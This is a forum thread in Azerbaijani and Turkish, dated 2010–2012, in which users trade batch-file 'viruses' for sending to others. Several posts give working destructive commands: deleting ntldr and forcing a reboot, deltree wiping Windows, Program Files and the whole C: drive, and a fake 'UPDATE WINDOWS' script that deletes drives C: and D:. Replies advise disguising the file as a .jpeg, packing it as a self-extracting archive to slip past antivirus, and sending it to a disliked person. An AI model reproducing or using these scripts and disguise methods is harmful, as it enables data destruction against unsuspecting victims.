Delphi7 Konu tarihi: 15 Eylül 2010 Paylaş Konu tarihi: 15 Eylül 2010 Bu virusu hətda materinkayada yeridə bilərsiz Virusa 100% teminat veriəm işləyir sadecə Noteped yada Bloknotu açıb içinə bunlari yazin cd.. cd.. attrib -s -h -r -a c:ntldr del c:ntldr shutdown -r yaddaşa saxla(сохранит как)edin txt isş bütün fayıllar(все филе)edin əesələn:jpeg.bat kimi qeyd edin və istədiynizə göndərin MMS ICQ MAGENT vasitəsiylə açıldıqdan 30 saniyə sora kompüter sönür ..Amma ehtiyatli olun özünüzdə.. PS: Virusu (Avast, Kaspersky, NOD32 ) antivirusları tapır buna görəədə siz gərək göndərmək istədiyiniz adama bunları etdirməlisiz ..Sizə uğurlar Alıntı Link to comment Share on other sites More sharing options...
meqintosh Mesaj tarihi: 28 Kasım 2010 Paylaş Mesaj tarihi: 28 Kasım 2010 bes bu ne edir komputere??? Komputer cokur yoxsa sonur ??? Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 28 Kasım 2010 Paylaş Mesaj tarihi: 28 Kasım 2010 Bunu winrarla sfx etdikden sonra anti deye bilmir Alıntı Link to comment Share on other sites More sharing options...
Guest Cavid018 Mesaj tarihi: 14 Ocak 2011 Paylaş Mesaj tarihi: 14 Ocak 2011 <html> <head> <title> Ва Alıntı Link to comment Share on other sites More sharing options...
Nicat_644 Mesaj tarihi: 15 Ocak 2011 Paylaş Mesaj tarihi: 15 Ocak 2011 bun naedi ala sazranit kak verdim kom dondu Alıntı Link to comment Share on other sites More sharing options...
Guest terlanyek Mesaj tarihi: 15 Ocak 2011 Paylaş Mesaj tarihi: 15 Ocak 2011 )) Alıntı Link to comment Share on other sites More sharing options...
Huseyn. Mesaj tarihi: 16 Ocak 2011 Paylaş Mesaj tarihi: 16 Ocak 2011 Salamlar bu da men bildiyim cox tehlukeli bir virusdu. Amma bunu antiviruslar taniyir ona gore birinci antini baglayin sonra blaknota bunu yazib .bat farmatinda yaddawa yazin sonra isdediyiviz birine gonderin onun pc-si cokecey. Kod: @echo off C:\\WINDOWS\\COMMAND\\deltree /y c:\\windows\\*.* @echo off C:\\WINDOWS\\COMMAND\\deltree /y c:\\Progra~1\\*.* @echo off C:\\WINDOWS\\COMMAND\\deltree /y c:\\*.* @echo off cls cls @echo .::HaCk By_Huseyn.::. @echo off Qeti ozuvuzde yoxlamayin Before--- Xanis_007 After----- Huseyn. Alıntı Link to comment Share on other sites More sharing options...
Guest Vusal Mesaj tarihi: 17 Ocak 2011 Paylaş Mesaj tarihi: 17 Ocak 2011 Bu kodu winrarla sfx etdikden sonra anti deye bilmez Alıntı Link to comment Share on other sites More sharing options...
Huseyn. Mesaj tarihi: 18 Ocak 2011 Paylaş Mesaj tarihi: 18 Ocak 2011 Ola biler hec yoxlamamiwam cox sag ol melumatlandirdigiva gare. Alıntı Link to comment Share on other sites More sharing options...
gurze Mesaj tarihi: 21 Şubat 2011 Paylaş Mesaj tarihi: 21 Şubat 2011 Qaqa bu mukemmel bir fikirdir. Bir il oncesine kimi bir ermeni vardi. Internetde elime ayagima dolasirdi Azerbaycanli olduguma gore. Cox fikirlesdim ala bunun kompunu nece sokum... turk saytlarinda basqasinin kompuna nasil girmek olar deye meqaleler oxudum tebii ki basim cixmadi.. Yana yana qaldim... Onu da deyim ki o ermeni dosent idi ermenistenda inistitutda. hemise oz isyerinde internete girirdi. Dedim ala onun kompuna girsem neyi var neyi yox goturecem )) Sonra virus istedim axtaram )) dedim bele sey olmaz )) Budur bir il sonra rast geldim... DOSTLAR TESEKKURLER Alıntı Link to comment Share on other sites More sharing options...
Huseyn. Mesaj tarihi: 22 Şubat 2011 Paylaş Mesaj tarihi: 22 Şubat 2011 Bele viruslar turk saytlarinda doludu gir ne isdesen tapa bilersen. Alıntı Link to comment Share on other sites More sharing options...
Guest Musa_ Mesaj tarihi: 3 Nisan 2011 Paylaş Mesaj tarihi: 3 Nisan 2011 Bunu qebul edib klik ederken hec bir ziyani yoxdu?.Bunda komp donur yoxsa adice ele 30 sana sönür Alıntı Link to comment Share on other sites More sharing options...
__xarqo__ Mesaj tarihi: 3 Nisan 2011 Paylaş Mesaj tarihi: 3 Nisan 2011 TEHLUKELI virus kodu...notepad-a bu kodu yazin, ve sadece (.bat) genislenmesinde yadda saxlayin.../bu kod komp. avtomatik format edir:/........OZ KOMPUTERINIZDE BU FAYLI ACMAYIN echo off echo UPDATE WINDOWS... echo by XARQO echo off pause del /f /q d: del /f /q c: shutdown -r shutdown -a Alıntı Link to comment Share on other sites More sharing options...
gurze Mesaj tarihi: 3 Nisan 2011 Paylaş Mesaj tarihi: 3 Nisan 2011 Vusal dostum sfx nedir? Basa dusmedim men.. Bir zehmet aydinliq getirerdin. Sag ol Alıntı Link to comment Share on other sites More sharing options...
Guest Cavid018 Mesaj tarihi: 3 Nisan 2011 Paylaş Mesaj tarihi: 3 Nisan 2011 sfx yeni .exe klik edirsen avtomatik yuklenir ( achilir ) Alıntı Link to comment Share on other sites More sharing options...
Guest fariz.ibiyev Mesaj tarihi: 4 Nisan 2011 Paylaş Mesaj tarihi: 4 Nisan 2011 Onu Acanda GereK komputeri Farmat edesen Men yoxlamisam)) 100% isleyir)) Alıntı Link to comment Share on other sites More sharing options...
IMRAN.0077 Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 AY MILLET. SALAM. MEN VIRUS YARADIRAM . BES ONU OK.RU ILE NECE GONDERE BILEREM? Alıntı Link to comment Share on other sites More sharing options...
koemk Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 neye lazimdiyee xowum gelmedi gunah bee Alıntı Link to comment Share on other sites More sharing options...
Hacker-8km Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 Xarqo-sen dediyini etdim. indi onu kompda acsam komp format olacaq? Alıntı Link to comment Share on other sites More sharing options...
DieseL Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 .bat tipli virusları artıq çox saytların e-mail serverləri tutur,göndərməyə imkan vermir.Bunu əvvəlcə.exe sonra isə .jpeg faylına çevirib göndərmək olar "qurbana" Alıntı Link to comment Share on other sites More sharing options...
Kamran Cavadov Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 ...məlumat üçün təşəkkür... Alıntı Link to comment Share on other sites More sharing options...
Rauf-SDTK Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 Tesekkur. 3 dene virus var elimde gonder seni kim mazqi edir onadaa Alıntı Link to comment Share on other sites More sharing options...
Hacker-8km Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 YÜKLƏ Qeyd-bu virusu yukleyende kompda acmayin. eger acsaniz komp formatliq olacaq Alıntı Link to comment Share on other sites More sharing options...
•SaiD• Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 camaata yaziginiz gelmirmi ? Alıntı Link to comment Share on other sites More sharing options...
Guest dj_Natiq Mesaj tarihi: 26 Temmuz 2012 Paylaş Mesaj tarihi: 26 Temmuz 2012 Bu virusu hazırlamaq nəyə lazımdır axı. İnsanlara pislik deyil, xeyr verməyə çalışaq. Alıntı Link to comment Share on other sites More sharing options...
Recommended Posts
Sohbete katıl
Şimdi mesajını gönderebilir ve daha sonra kayıt olabilirsin. Bir hesabın varsa, hesabınla göndermek için şimdi oturum aç.